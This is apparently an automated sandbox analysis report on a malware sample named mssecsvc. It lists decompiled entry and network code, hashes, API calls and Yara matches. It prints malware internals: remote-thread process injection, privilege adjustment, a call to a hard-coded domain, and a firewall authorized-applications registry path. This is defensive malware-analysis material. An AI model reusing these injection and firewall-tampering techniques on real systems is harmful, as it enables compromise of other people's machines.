                    • Opcode Fuzzy Hash: 070b698a65d812778bebda462e03455ac2d4d74c25fc029a23958a9dd811b266
                    • Instruction Fuzzy Hash: A1E0DFF1342105BAFB288B19CC07FB7220DCBC0600F048604F918DA090E6F4AF104278
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B02574 Relevance: 3.1, APIs: 2, Instructions: 66nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 251 b02574-b0257c call b0252f 254 b02661-b02664 251->254 255 b02582-b025b4 NtMapViewOfSection FindCloseChangeNotification 251->255 255->254 256 b025ba-b025c0 255->256 257 b025c2-b025cb 256->257 258 b025ce-b025d8 256->258 257->258 259 b025da-b025e2 258->259 260 b025ef-b0262a call b02477 * 3 258->260 259->260 262 b025e4-b025ea call b02477 259->262 269 b02637-b0263f 260->269 270 b0262c-b02632 call b02477 260->270 262->260 272 b02641-b02647 call b02477 269->272 273 b0264c-b02654 269->273 270->269 272->273 273->254 275 b02656-b0265c call b02477 273->275 275->254
                    APIs
                      • Part of subcall function 00B0252F: NtOpenSection.NTDLL(?,0000000E), ref: 00B0255E
                    • NtMapViewOfSection.NTDLL(00000000,?,?,00000000,0000B7C4,00000000,?,00000002,00100000,00000040), ref: 00B025A4
                    • FindCloseChangeNotification.KERNELBASE(00000000,0000B7C4,00000000,?,00000002,00100000,00000040,00000000,0000B7C4,00000000,?,00B00815), ref: 00B025AC
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Section$ChangeCloseFindNotificationOpenView
                    • String ID:
                    • API String ID: 1694706092-0
                    • Opcode ID: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                    • Instruction ID: d3f5b40c626df736e049f7246ff985d567c5d05cf1db0248d21d5c6056eb10d8
                    • Opcode Fuzzy Hash: 7e6d81ae67240a40e11905e7904a542b9946b97cc322a4af05470e0a41c17acf
                    • Instruction Fuzzy Hash: 0F213E70300546BBDB28DF25CC5AFA9BBA9FF91744F404158F9198E2D4DBB2AE18C718
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B01422 Relevance: 3.0, APIs: 2, Instructions: 38nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 277 b01422-b01474 LookupPrivilegeValueA NtAdjustPrivilegesToken
                    APIs
                    • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00B0145A
                    • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00B0146A
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID:
                    • API String ID: 3615134276-0
                    • Opcode ID: 93769c60b222f1b750d747f357397c67afbd40ef6ee3f9ba66e61aa9824ec2a4
                    • Instruction ID: ddbff97e699881e74d61e2820170bd54818263a6fff0c1519b9bac5ac29647fb
                    • Opcode Fuzzy Hash: 93769c60b222f1b750d747f357397c67afbd40ef6ee3f9ba66e61aa9824ec2a4
                    • Instruction Fuzzy Hash: 5BF0AE36542510BBD7205F56CD8EED77F28EF533A0F144556F4484E151C2624BA5D3F4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B02477 Relevance: 3.0, APIs: 2, Instructions: 25nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 278 b02477-b024ad NtProtectVirtualMemory NtWriteVirtualMemory
                    APIs
                    • NtProtectVirtualMemory.NTDLL(?,?,?,00000040), ref: 00B0249B
                    • NtWriteVirtualMemory.NTDLL ref: 00B024A4
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: MemoryVirtual$ProtectWrite
                    • String ID:
                    • API String ID: 151266762-0
                    • Opcode ID: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                    • Instruction ID: 6bbb67ea70d6ee96dfa5f1d7b4d314b28acc786a60d934acbd3f762ecc45b662
                    • Opcode Fuzzy Hash: 3b89ad314080acfcfa5e752e4380cd5b7e8fc3aa7940f56e0bfe36a9f1ccff9c
                    • Instruction Fuzzy Hash: 2AE012E07502007FF5185F55DC5FF7B391DDB41751F410208FA0A981C4F9A15E18467A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B0144A Relevance: 3.0, APIs: 2, Instructions: 22nativeCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 279 b0144a-b01474 LookupPrivilegeValueA NtAdjustPrivilegesToken
                    APIs
                    • LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00B0145A
                    • NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00B0146A
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                    • String ID:
                    • API String ID: 3615134276-0
                    • Opcode ID: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                    • Instruction ID: ee32c209e3d0a2de55b6acbdbca8a3d00d8b73f2470e3acbbab87dcaf3c2c19a
                    • Opcode Fuzzy Hash: f45ad7484d04f34a0af0f423c52b42987f710650b5115a9fa6d287fad7b05342
                    • Instruction Fuzzy Hash: F2D06731643034BBD6312A568C0EEE77D1DEF577A0F015041F9089A1A1C5A28EA1C7F5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00409A16 Relevance: 16.6, APIs: 11, Instructions: 111COMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 146 409a16-409a8b __set_app_type __p__fmode __p__commode call 409ba1 149 409a99-409af0 call 409b8c _initterm __getmainargs _initterm 146->149 150 409a8d-409a98 __setusermatherr 146->150 153 409af2-409afa 149->153 154 409b2c-409b2f 149->154 150->149 157 409b00-409b03 153->157 158 409afc-409afe 153->158 155 409b31-409b35 154->155 156 409b09-409b0d 154->156 155->154 160 409b13-409b24 GetStartupInfoA 156->160 161 409b0f-409b11 156->161 157->156 159 409b05-409b06 157->159 158->153 158->157 159->156 162 409b26-409b2a 160->162 163 409b37-409b39 160->163 161->159 161->160 164 409b3a-409b45 GetModuleHandleA call 408140 162->164 163->164 166 409b4a-409b67 exit _XcptFilter 164->166
                    C-Code - Quality: 71%
                    			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char** _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				void* _t27;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x40a1a0);
				_push(0x409ba2);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x70f894 =  *0x70f894 | 0xffffffff;
				 *0x70f898 =  *0x70f898 | 0xffffffff;
				 *(__p__fmode()) =  *0x70f88c;
				 *(__p__commode()) =  *0x70f888;
				 *0x70f890 = _adjust_fdiv;
				_t27 = E00409BA1( *_adjust_fdiv);
				_t61 =  *0x431410; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E00409B9E);
				}
				E00409B8C(_t27);
				_push(0x40b010);
				_push(0x40b00c);
				L00409B86();
				_v112 =  *0x70f884;
				__getmainargs( &_v100,  &_v116,  &_v104,  *0x70f880,  &_v112);
				_push(0x40b008);
				_push(0x40b000); // executed
				L00409B86(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
				_v96.dwFlags = 0;
				GetStartupInfoA( &_v96);
				if((_v96.dwFlags & 0x00000001) == 0) {
					_t38 = 0xa;
				} else {
					_t38 = _v96.wShowWindow & 0x0000ffff;
				}
				_push(_t38);
				_push(_t55);
				_push(0);
				_push(GetModuleHandleA(0));
				_t40 = E00408140();
				_v108 = _t40;
				exit(_t40);
				_t41 = _v24;
				_t49 =  *((intOrPtr*)( *_t41));
				_v124 = _t49;
				_push(_t41);
				_push(_t49);
				L00409B80();
				return _t41;
			}
























                    0x00409a19
                    0x00409a1b
                    0x00409a20
                    0x00409a2b
                    0x00409a2c
                    0x00409a39
                    0x00409a3e
                    0x00409a43
                    0x00409a4a
                    0x00409a51
                    0x00409a64
                    0x00409a72
                    0x00409a7b
                    0x00409a80
                    0x00409a85
                    0x00409a8b
                    0x00409a92
                    0x00409a98
                    0x00409a99
                    0x00409a9e
                    0x00409aa3
                    0x00409aa8
                    0x00409ab2
                    0x00409acb
                    0x00409ad1
                    0x00409ad6
                    0x00409adb
                    0x00409ae8
                    0x00409aea
                    0x00409af0
                    0x00409b2c
                    0x00409b31
                    0x00409b32
                    0x00409b32
                    0x00409af2
                    0x00409af2
                    0x00409af2
                    0x00409af3
                    0x00409af6
                    0x00409af8
                    0x00409b03
                    0x00409b05
                    0x00409b05
                    0x00409b06
                    0x00409b06
                    0x00409b03
                    0x00409b09
                    0x00409b0d
                    0x00000000
                    0x00000000
                    0x00409b13
                    0x00409b1a
                    0x00409b24
                    0x00409b39
                    0x00409b26
                    0x00409b26
                    0x00409b26
                    0x00409b3a
                    0x00409b3b
                    0x00409b3c
                    0x00409b44
                    0x00409b45
                    0x00409b4a
                    0x00409b4e
                    0x00409b54
                    0x00409b59
                    0x00409b5b
                    0x00409b5e
                    0x00409b5f
                    0x00409b60
                    0x00409b67

                    APIs
                    Memory Dump Source
                    • Source File: 00000004.00000002.706449396.0000000000409000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.706383817.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706408754.0000000000401000.00000080.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706496424.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706511884.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706619607.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706680871.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                    • String ID:
                    • API String ID: 801014965-0
                    • Opcode ID: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                    • Instruction ID: f220c78e044b43db95b39954543cb8470338bddc8e57b6bf74c51ec52977e19a
                    • Opcode Fuzzy Hash: 372b72291a79fe7f323a7fd117d835006d69336e2c0488ca977e4fa79056e622
                    • Instruction Fuzzy Hash: AF415E71800348EFDB24DFA4ED45AAA7BB8FB09720F20413BE451A72D2D7786841CB59
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B007AC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 167 b007ac-b007bf call b0144a FreeLibrary FindCloseChangeNotification 170 b007c5-b007e4 CreateToolhelp32Snapshot Process32First 167->170 171 b007eb-b007f5 Process32Next 170->171 172 b00865-b00872 FindCloseChangeNotification 171->172 173 b007f7-b007fb 171->173 174 b005a9-b005d1 FindCloseChangeNotification 172->174 173->171 175 b007fd-b0080d OpenProcess 173->175 179 b005d3-b005fc SetProcessAffinityMask call b005f2 174->179 175->171 176 b0080f 175->176 178 b00810-b00818 call b02574 176->178 184 b0081a-b00820 178->184 185 b0085c-b00863 FindCloseChangeNotification 178->185 187 b00621-b00623 179->187 188 b005fe-b0061c 179->188 184->185 186 b00822-b00832 184->186 185->171 186->185 189 b00834-b0084b CreateRemoteThread 186->189 190 b00625-b00630 187->190 191 b0064c-b00652 187->191 188->187 189->185 192 b0084d-b00857 call b005ba 189->192 193 b00632 190->193 194 b00639-b00648 190->194 191->174 195 b00658-b00671 191->195 192->185 193->194 194->191 195->174 197 b00677-b00690 195->197 197->174 198 b00696-b0069c 197->198 199 b006d8-b006de 198->199 200 b0069e-b006b1 198->200 202 b006e0-b006f3 199->202 203 b006fc-b00715 lstrcpyW call b024ae 199->203 200->174 201 b006b7-b006bd 200->201 201->199 204 b006bf-b006d2 201->204 202->203 205 b006f5 202->205 208 b00717-b00746 GetPEB lstrcpyW lstrcatW call b024ae 203->208 209 b0074c-b00775 NtMapViewOfSection 203->209 204->174 204->199 205->203 208->174 208->209 209->174 211 b0077b-b0078f call b00305 NtOpenProcessToken 209->211 211->170 215 b00791-b007a3 call b0115d call b007ac 211->215 220 b007a5 215->220 221 b0080e-b0080f 215->221 220->178 222 b007a7-b007e4 CreateToolhelp32Snapshot Process32First 220->222 221->178 222->171
                    APIs
                      • Part of subcall function 00B0144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 00B0145A
                      • Part of subcall function 00B0144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 00B0146A
                    • FindCloseChangeNotification.KERNELBASE(?), ref: 00B005AD
                    • FreeLibrary.KERNEL32(76EF0000,?,00B0079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B007B8
                    • FindCloseChangeNotification.KERNELBASE(?,?,00B0079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B007BF
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00B007C9
                    • Process32First.KERNEL32 ref: 00B007DC
                    • Process32Next.KERNEL32 ref: 00B007ED
                    • OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B00805
                    • CreateRemoteThread.KERNELBASE(?,00000000,00000000,-00003C38,00000002,00000000), ref: 00B00842
                    • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 00B0085D
                    • FindCloseChangeNotification.KERNELBASE ref: 00B0086C
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: ChangeCloseFindNotification$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
                    • String ID: csrs
                    • API String ID: 238827593-2321902090
                    • Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                    • Instruction ID: 1aa63aa34c53b7b6fd0117475550230dcc78404d8e010b5726b5b7faae6631a0
                    • Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
                    • Instruction Fuzzy Hash: 0C113030511205BFEB256F21CC4ABBF3EADEF54702F0040ACF94A9A091D7B49F019A6A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00408140 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46networkCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    C-Code - Quality: 92%
                    			E00408140() {
				char* _v1;
				char* _v3;
				char* _v7;
				char* _v11;
				char* _v15;
				char* _v19;
				char* _v23;
				void _v80;
				char _v100;
				char* _t12;
				void* _t13;
				void* _t27;

				_t12 = memcpy( &_v80, "http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com", 0xe << 2);
				asm("movsb");
				_v23 = _t12;
				_v19 = _t12;
				_v15 = _t12;
				_v11 = _t12;
				_v7 = _t12;
				_v3 = _t12;
				_v1 = _t12;
				_t13 = InternetOpenA(_t12, 1, _t12, _t12, _t12); // executed
				_t27 = _t13;
				InternetOpenUrlA(_t27,  &_v100, 0, 0, 0x84000000, 0); // executed
				InternetCloseHandle(_t27); // executed
				InternetCloseHandle(0);
				E00408090();
				return 0;
			}















                    0x00408155
                    0x00408157
                    0x00408158
                    0x0040815c
                    0x00408160
                    0x00408164
                    0x00408168
                    0x0040816c
                    0x00408177
                    0x0040817b
                    0x0040818e
                    0x00408194
                    0x004081a7
                    0x004081ab
                    0x004081ad
                    0x004081b9

                    APIs
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040817B
                    • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00408194
                    • InternetCloseHandle.WININET(00000000), ref: 004081A7
                    • InternetCloseHandle.WININET(00000000), ref: 004081AB
                      • Part of subcall function 00408090: GetModuleFileNameA.KERNEL32(00000000,0070F760,00000104,?,004081B2), ref: 0040809F
                      • Part of subcall function 00408090: __p___argc.MSVCRT ref: 004080A5
                    Strings
                    • http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com, xrefs: 0040814A
                    Memory Dump Source
                    • Source File: 00000004.00000002.706408754.0000000000401000.00000080.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.706383817.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706449396.0000000000409000.00000040.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706496424.000000000040A000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706511884.000000000040B000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706619607.000000000040F000.00000008.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706680871.0000000000431000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.706767542.0000000000710000.00000080.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.708228244.0000000000A6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internet$CloseHandleOpen$FileModuleName__p___argc
                    • String ID: http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
                    • API String ID: 774561529-2942426231
                    • Opcode ID: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                    • Instruction ID: cdf7c9b464921ed547f6e9cf97b0948ff8b518ee0850ecae1f57fc3afa3cefd0
                    • Opcode Fuzzy Hash: 4b6db363f3c2a0039692f7716f941ccdaf41bdcfad687f466c5e8bce3354d2d7
                    • Instruction Fuzzy Hash: D20186719543106EE310DF348C05B6BBBE9EF85710F01082EF984F7280E6B59804876B
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA4499 Relevance: 7.6, APIs: 5, Instructions: 83fileCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 227 7fea4499-7fea44a1 228 7fea44c8-7fea4504 CreateFileA 227->228 229 7fea44a3-7fea44ad GetFileAttributesA 227->229 236 7fea4506-7fea451f 228->236 237 7fea4527-7fea454d 228->237 229->228 230 7fea44af-7fea44c0 SetFileAttributesA 229->230 230->228 232 7fea44c2 230->232 232->228 236->237 240 7fea4521 236->240 242 7fea4558-7fea4582 CreateFileMappingA 237->242 243 7fea454f-7fea4556 237->243 240->237 246 7fea458d-7fea45a2 MapViewOfFile 242->246 247 7fea4584-7fea458b 242->247 243->242 249 7fea45a8-7fea45ae 246->249 247->246
                    APIs
                    • GetFileAttributesA.KERNELBASE(?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44A4
                    • SetFileAttributesA.KERNELBASE(?,00000000,?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44B8
                    • CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61,?,?,7FEA4406,?,7FEA43E8,?,7FEA43C4), ref: 7FEA44ED
                    • CreateFileMappingA.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FEA4565
                    • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000000,?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61), ref: 7FEA459A
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: File$AttributesCreate$MappingView
                    • String ID:
                    • API String ID: 1961427682-0
                    • Opcode ID: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
                    • Instruction ID: 5241e261c6a8b1a9cf08daa61a461fa69fc83fe37cd40be9c894cf7c8eac2c63
                    • Opcode Fuzzy Hash: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
                    • Instruction Fuzzy Hash: E62112B0205309BFEF219E658D45BFA366DAF01619F500229E91A9E0A4D7F5AF058728
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B005BA Relevance: 1.3, APIs: 1, Instructions: 7sleepCOMMON
                    Download Yara Rule

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 280 b005ba-b005bd 281 b005c9 280->281 282 b005bf-b005c7 Sleep 280->282 282->280
                    APIs
                    • Sleep.KERNELBASE(0000000A,00B0085C,?,00000000,00000000,-00003C38,00000002,00000000,?,00000000), ref: 00B005C1
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
                    • Instruction ID: 1b998fdb77a0b33727ba289b57c3e228ca6def8b45a68119d6a5a2c04fd7d553
                    • Opcode Fuzzy Hash: 3c1f989dfd13240381299ec7adf5382b251643946d8aa86ca05208ab7bb78418
                    • Instruction Fuzzy Hash: E0B0122825030099DA1429104CCEF041EA47F10B51FE000D9E2064C0C007E407001D0A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 7FEA3C3D Relevance: 46.0, APIs: 21, Strings: 5, Instructions: 487libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowsDirectoryA.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,00000104), ref: 7FEA3CA1
                    • GetProcAddress.KERNEL32(00000000,00000002), ref: 7FEA3CD4
                    • GetProcAddress.KERNEL32(00000000,7FEA3D41), ref: 7FEA3D4C
                    • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FEA3D5F
                    • GetTickCount.KERNEL32 ref: 7FEA3D93
                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FEA6EF6,00000000,00000000,00000000,00000000), ref: 7FEA3E65
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 7FEA3EE2
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.709969347.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FEA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_7fea0000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 1749273276-504487454
                    • Opcode ID: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                    • Instruction ID: 6856dd48e4ced1a9f2286be03aa6e2628cc93b41bccce76cbf3563a38adebb89
                    • Opcode Fuzzy Hash: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                    • Instruction Fuzzy Hash: 10020571419348BFEB229F748C4ABEA7BACEF41304F004559EC4A9E081D7F66F4597A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00B03C3D Relevance: 46.0, APIs: 21, Strings: 5, Instructions: 487libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindowsDirectoryA.KERNEL32(C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,00000104), ref: 00B03CA1
                    • GetProcAddress.KERNEL32(00000000,00000002), ref: 00B03CD4
                    • GetProcAddress.KERNEL32(00000000,00B03D41), ref: 00B03D4C
                    • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00B03D5F
                    • GetTickCount.KERNEL32 ref: 00B03D93
                    • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,00B06EF6,00000000,00000000,00000000,00000000), ref: 00B03E65
                    • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe,000000C8), ref: 00B03EE2
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.708384122.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Offset: 00B00000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_b00000_mssecsvc.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
                    • String ID: ADVAPI32.DLL$C:,$C:\Program Files (x86)\yqIOXMrjJkZANEhcJgMboTthHeogiiDczysBGeLWXnawaYnDPaogUOptpCejTLXKyiRz\LioVGtEOujQGOmgxfcetgRpEYlupJu.exe$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
                    • API String ID: 1749273276-504487454
                    • Opcode ID: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                    • Instruction ID: 30f6b726b2dc0a9ec4678c08a5921c73451881e265310739d5db59524fc70b09
                    • Opcode Fuzzy Hash: f516923bb6111dac5ea2ce27cbf4c730b644d8035d3db586d383e9b78a19a3eb
                    • Instruction Fuzzy Hash: 0102E0B1518258BFEB21AF248C4EBEA7FECEF41700F004599E9499E0C2D7F05F4586A6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 7FEA3CC2 Relevance: 44.2, APIs: 20, Strings: 5, Instructions: 432libraryloaderCOMMON
                    Download Yara Rule
                    APIs
